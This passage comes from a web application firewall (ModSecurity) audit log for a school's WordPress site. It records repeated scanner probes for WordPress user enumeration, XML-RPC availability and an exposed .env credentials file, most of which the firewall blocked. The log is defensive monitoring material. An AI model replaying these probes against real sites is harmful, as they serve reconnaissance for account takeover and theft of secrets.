Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746341014610830 5769 (- - -) Stopwatch2: 1746341014610830 5769; combined=4226, p1=532, p2=3404, p3=33, p4=33, p5=156, sr=73, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f444d55f-Z-- --40f1db62-A-- [04/May/2025:13:43:42 +0700] aBcMnmJEE9ao5dcyYWnxJgAAAIw 103.236.140.4 50516 103.236.140.4 8181 --40f1db62-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.12.178 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.12.178 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --40f1db62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40f1db62-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746341022404668 2347 (- - -) Stopwatch2: 1746341022404668 2347; combined=1160, p1=388, p2=746, p3=0, p4=0, p5=26, sr=129, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40f1db62-Z-- --be1dc248-A-- [04/May/2025:13:43:47 +0700] aBcMo2JEE9ao5dcyYWnxKAAAAJI 103.236.140.4 50520 103.236.140.4 8181 --be1dc248-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.12.178 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.12.178 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --be1dc248-C-- demo.sayHello --be1dc248-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --be1dc248-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746341027562655 4648 (- - -) Stopwatch2: 1746341027562655 4648; combined=3659, p1=431, p2=3028, p3=24, p4=26, p5=89, sr=66, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --be1dc248-Z-- --9a408a0e-A-- [04/May/2025:13:43:50 +0700] aBcMpuchPF6irSergtv9-wAAAMc 103.236.140.4 50528 103.236.140.4 8181 --9a408a0e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.174.142 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.174.142 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9a408a0e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9a408a0e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746341030423485 2297 (- - -) Stopwatch2: 1746341030423485 2297; combined=1048, p1=372, p2=644, p3=0, p4=0, p5=31, sr=106, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9a408a0e-Z-- --f217e80a-A-- [04/May/2025:13:43:53 +0700] aBcMqWJEE9ao5dcyYWnxLAAAAIE 103.236.140.4 50532 103.236.140.4 8181 --f217e80a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.174.142 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.174.142 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f217e80a-C-- demo.sayHello --f217e80a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f217e80a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746341033870317 4594 (- - -) Stopwatch2: 1746341033870317 4594; combined=3601, p1=410, p2=2996, p3=24, p4=25, p5=86, sr=64, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f217e80a-Z-- --f8b28076-A-- [04/May/2025:13:45:13 +0700] aBcM-dsVQyl9V2B8Pt-9YQAAAFg 103.236.140.4 50552 103.236.140.4 8181 --f8b28076-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.101.146 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.101.146 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f8b28076-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f8b28076-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746341113705291 2848 (- - -) Stopwatch2: 1746341113705291 2848; combined=1243, p1=433, p2=780, p3=0, p4=0, p5=29, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f8b28076-Z-- --cf618a39-A-- [04/May/2025:13:45:18 +0700] aBcM_mJEE9ao5dcyYWnxLwAAAIA 103.236.140.4 50560 103.236.140.4 8181 --cf618a39-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.101.146 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.101.146 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cf618a39-C-- demo.sayHello --cf618a39-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cf618a39-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746341118453129 5766 (- - -) Stopwatch2: 1746341118453129 5766; combined=4273, p1=570, p2=3498, p3=32, p4=31, p5=84, sr=116, sw=58, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cf618a39-Z-- --36d2e003-A-- [04/May/2025:14:55:31 +0700] aBcdc_nZiHJYHUAF8QfhJAAAAAU 103.236.140.4 51750 103.236.140.4 8181 --36d2e003-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.89.246 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.89.246 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --36d2e003-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --36d2e003-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746345331618881 3208 (- - -) Stopwatch2: 1746345331618881 3208; combined=1429, p1=490, p2=907, p3=0, p4=0, p5=32, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36d2e003-Z-- --02146452-A-- [04/May/2025:14:55:34 +0700] aBcddvnZiHJYHUAF8QfhJQAAAAc 103.236.140.4 51754 103.236.140.4 8181 --02146452-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.89.246 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.89.246 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --02146452-C-- demo.sayHello --02146452-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --02146452-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746345334431616 5395 (- - -) Stopwatch2: 1746345334431616 5395; combined=4080, p1=522, p2=3345, p3=29, p4=33, p5=90, sr=74, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02146452-Z-- --6276d23f-A-- [04/May/2025:14:56:26 +0700] aBcdqvnZiHJYHUAF8QfhJwAAAAQ 103.236.140.4 51758 103.236.140.4 8181 --6276d23f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6276d23f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6276d23f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746345386639443 3224 (- - -) Stopwatch2: 1746345386639443 3224; combined=1333, p1=488, p2=810, p3=0, p4=0, p5=35, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6276d23f-Z-- --c0003d76-A-- [04/May/2025:14:56:29 +0700] aBcdrfnZiHJYHUAF8QfhKQAAAAk 103.236.140.4 51762 103.236.140.4 8181 --c0003d76-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.2 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c0003d76-C-- demo.sayHello --c0003d76-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0003d76-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746345389965681 4817 (- - -) Stopwatch2: 1746345389965681 4817; combined=3654, p1=427, p2=3023, p3=22, p4=25, p5=91, sr=64, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c0003d76-Z-- --87737b50-A-- [04/May/2025:15:30:44 +0700] aBcltPnZiHJYHUAF8QfjpAAAAAY 103.236.140.4 57152 103.236.140.4 8181 --87737b50-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.46 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --87737b50-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --87737b50-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746347444980082 3005 (- - -) Stopwatch2: 1746347444980082 3005; combined=1359, p1=469, p2=861, p3=0, p4=0, p5=29, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --87737b50-Z-- --d235ff23-A-- [04/May/2025:15:30:52 +0700] aBclvPnZiHJYHUAF8QfjpQAAAAI 103.236.140.4 57156 103.236.140.4 8181 --d235ff23-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.46 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d235ff23-C-- demo.sayHello --d235ff23-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d235ff23-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746347452042656 5384 (- - -) Stopwatch2: 1746347452042656 5384; combined=4078, p1=503, p2=3360, p3=29, p4=32, p5=92, sr=73, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d235ff23-Z-- --0bb69f61-A-- [04/May/2025:15:41:21 +0700] aBcoMfnZiHJYHUAF8Qfj5wAAAAs 103.236.140.4 57732 103.236.140.4 8181 --0bb69f61-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.175.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.175.141 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0bb69f61-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0bb69f61-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746348081496618 2919 (- - -) Stopwatch2: 1746348081496618 2919; combined=1312, p1=447, p2=832, p3=0, p4=0, p5=32, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0bb69f61-Z-- --d10a164c-A-- [04/May/2025:15:41:28 +0700] aBcoOGJEE9ao5dcyYWn1XwAAAI4 103.236.140.4 57736 103.236.140.4 8181 --d10a164c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.175.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.175.141 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d10a164c-C-- demo.sayHello --d10a164c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d10a164c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746348088276352 5927 (- - -) Stopwatch2: 1746348088276352 5927; combined=4302, p1=558, p2=3533, p3=31, p4=35, p5=86, sr=79, sw=59, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d10a164c-Z-- --7a867663-A-- [04/May/2025:15:45:08 +0700] aBcpFPnZiHJYHUAF8Qfj6AAAABA 103.236.140.4 58208 103.236.140.4 8181 --7a867663-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.144 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.144 X-Forwarded-Proto: https Connection: close User-Agent: Wget/1.12 (freebsd8.1) Accept-Charset: utf-8 --7a867663-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a867663-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746348308418286 831 (- - -) Stopwatch2: 1746348308418286 831; combined=331, p1=289, p2=0, p3=0, p4=0, p5=42, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a867663-Z-- --4903a258-A-- [04/May/2025:15:46:27 +0700] aBcpY_nZiHJYHUAF8Qfj6wAAABc 103.236.140.4 58242 103.236.140.4 8181 --4903a258-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.193.189 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.193.189 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4903a258-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4903a258-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746348387507467 1998 (- - -) Stopwatch2: 1746348387507467 1998; combined=942, p1=316, p2=598, p3=0, p4=0, p5=28, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4903a258-Z-- --0c7dac10-A-- [04/May/2025:15:46:32 +0700] aBcpaGJEE9ao5dcyYWn2UwAAAJc 103.236.140.4 58266 103.236.140.4 8181 --0c7dac10-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.193.189 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.193.189 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0c7dac10-C-- demo.sayHello --0c7dac10-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c7dac10-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file 